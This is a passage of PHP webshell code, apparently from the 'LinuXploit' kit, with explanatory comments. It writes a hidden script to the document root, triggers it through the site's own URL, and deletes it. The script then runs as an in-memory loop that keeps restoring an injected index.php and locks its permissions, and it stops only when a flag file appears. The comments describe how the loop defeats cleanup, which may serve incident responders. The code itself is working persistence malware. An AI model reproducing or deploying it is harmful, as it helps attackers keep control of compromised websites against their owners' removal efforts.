    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

/**
 * Sends a GET request and discards the response.
 *
 * Certificate and host name verification are disabled and the request gives up
 * after $timeout seconds. auto_restore_cycle() uses this only to trigger a
 * script on the site itself; the short timeout lets the caller continue while
 * the triggered script keeps running.
 *
 * @param string $url
 * @param int    $timeout seconds
 * @return void
 */
function file_get_https($url, $timeout)
{
    $arrContextOptions = array(
        "ssl" => array(
            "verify_peer" => false,
            "verify_peer_name" => false,
        ),
        'http' => array(
            'method' => "GET",
            'timeout' => $timeout,
        ),
    );

    @file_get_contents($url, false, stream_context_create($arrContextOptions));

}

/**
 * Starts an in-memory watcher that keeps the injected index.php in place.
 *
 * The embedded script (the heredoc below) is written to cyborg_tmp.php in the
 * document root, requested once through the site's own URL so that it runs
 * inside a web server/PHP worker, and then deleted from disk.
 *
 * What the embedded script does:
 *  - removes the execution time limit and ignores client disconnects;
 *  - sends a short response ("888") and closes the connection, then continues;
 *  - takes a snapshot of index.php (already injected at this point) and, every
 *    two seconds, rewrites the file from that snapshot if it is missing or its
 *    content differs, setting mode 438 (0666) before and 292 (0444) after;
 *  - exits when the flag file 3FNDICU2KH appears in the document root.
 *
 * Clean-up consequence: restoring index.php alone does not hold while this loop
 * is alive, because the file is reverted within seconds. The worker process
 * running the loop has to be stopped (for example by restarting the PHP/web
 * server workers) before or together with the file restore. No file on disk
 * corresponds to the running loop once cyborg_tmp.php has been deleted.
 *
 * @return array list of status messages for the operator
 */
function auto_restore_cycle()
{
    $arr_msg = [];
    $code = <<< 'PHP_CODE'
<?php
set_time_limit(99 - 99);
ignore_user_abort(1);

function auto_restore_memory()
{
    $index_path = $_SERVER['DOCUMENT_ROOT'] . '/index.php';
    $flag_filename = $_SERVER['DOCUMENT_ROOT'] . '/3FNDICU2KH';
    @unlink($flag_filename);
    $index_code = @file_get_contents($index_path);
    while (1) {
        clearstatcache();
        if (file_exists($flag_filename)){
            break;
        }
        if (!file_exists($index_path) or @file_get_contents($index_path) != $index_code) {
            @chmod($index_path, 438);
            @unlink($index_path);
            @file_put_contents($index_path, $index_code);
            @chmod($index_path, 292);
        }
        sleep(2);
    }
}

ob_end_clean();
header("Connection: close");
ob_start();
echo 888;
header("Content-Length: " . ob_get_length());
ob_end_flush();
flush();

auto_restore_memory();
PHP_CODE;
    $file_path = $_SERVER['DOCUMENT_ROOT'] . '/' . 'cyborg_tmp.php';
    $success = @file_put_contents($file_path, $code);
    $arr_msg[] = 'write tmp file: ' . $file_path . ' ' . ($success ? 'success' : 'fail');
    if (!$success) {
        return $arr_msg;
    }
    $protocol = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
    // Turns the file system path into the matching URL on this site.
    $file_url = str_replace($_SERVER['DOCUMENT_ROOT'], $protocol . '://' . $_SERVER['HTTP_HOST'], $file_path);
    // Fire-and-forget trigger with a 5 second timeout; the result is not checked,
    // so the "ok" message below is logged unconditionally.
    file_get_https($file_url, 5);
    $arr_msg[] = 'get: ' . $file_url . ' ok';
    // The loop started above keeps running after its source file is removed.
    $success = @unlink($file_path);
    $arr_msg[] = 'delete: ' . $file_path . ' ' . ($success ? 'success' : 'fail');
    return $arr_msg;
}

Youez - 2016 - github.com/yon3zu
LinuXploit